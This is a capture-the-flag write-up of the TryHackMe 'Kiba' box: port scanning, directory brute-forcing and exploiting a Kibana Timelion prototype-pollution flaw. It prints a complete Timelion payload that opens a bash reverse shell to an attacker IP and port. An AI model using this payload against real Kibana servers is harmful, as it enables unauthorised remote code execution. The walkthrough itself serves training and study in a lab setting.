THM - Kiba
Identify the critical security flaw in the data visualization dashboard, that allows execute remote code execution.
Alrighty; easy rated.
We’ve got four ports: SSH on 22 and HTTP on 80, plus two mystery ports in 5044 and 5601.
There’s nothing much on the front page on Port 80 except some ASCII art and a cryptic message; nothing extra in the page source. Time to gobuster:
root@kali:/opt/tryhackme/kiba# gobuster dir -u http://10.10.19.10 -w /usr/share/dirb/wordlists/common.txt
Nothing. Let’s try another port, but we’ll come back to this if necessary.
Visting it in the browser we find another HTTP site running kibana; I guess this is what we’re after based on the title.
This machine is quite ‘hand-holding’ because the questions ask about finding a CVE for the version, so we know there is a readily available exploit. I looked at a couple of sources, the main one was here but also this github repo explains it too.
Essentially it’s go to the Timelion tab, enter the exploit code, hit play and then go to the Canvas tab and wait for your shell. Opening Canvas spawns a new process, and the exploit code pollutes the prototypes if I’ve understood this correctly.
My exploit code was:
.es(*).props(label.proto.env.AAAA=’require(“child_process”).exec(“bash -c 'bash -i>& /dev/tcp/10.9.10.123/1234 0>&1'”);//’) .props(label.proto.env.NODE_OPTIONS=’–require /proc/self/environ’)
On the box
As our user (kiba) we have access to the user flag. The THM page now hints that we’re looking at capabilities for exploit - look, it’s short enough that I’ll just show it here:
And that was that.